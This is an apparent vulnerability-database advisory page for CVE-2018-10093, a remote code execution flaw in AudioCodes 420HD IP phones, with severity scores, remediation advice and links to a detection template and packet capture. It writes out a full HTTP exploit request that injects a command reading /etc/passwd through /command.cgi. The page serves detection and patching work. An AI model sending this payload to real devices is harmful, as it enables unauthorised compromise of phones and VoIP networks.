🔙 목록으로 돌아가기

CVE-2018-10093: AudioCodes 420HD - Remote Code Execution

TitleAudioCodes 420HD - Remote Code Execution
Authorwisnupramoedya
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the device, potentially leading to a complete compromise of the phone and unauthorized access to the VoIP network.
RemediationApply the latest firmware update provided by AudioCodes to fix the vulnerability and ensure proper input validation.
CVSS Score8.8
EPSS Score0.67408
CVE IDCVE-2018-10093
CWE IDCWE-862
Tags cve cve2018 rce iot audiocode edb seclists audiocodes vuln

🔍 Vulnerability Description

AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.

🌐 HTTP Request

GET /command.cgi?cat%20/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-10093.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-10093.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A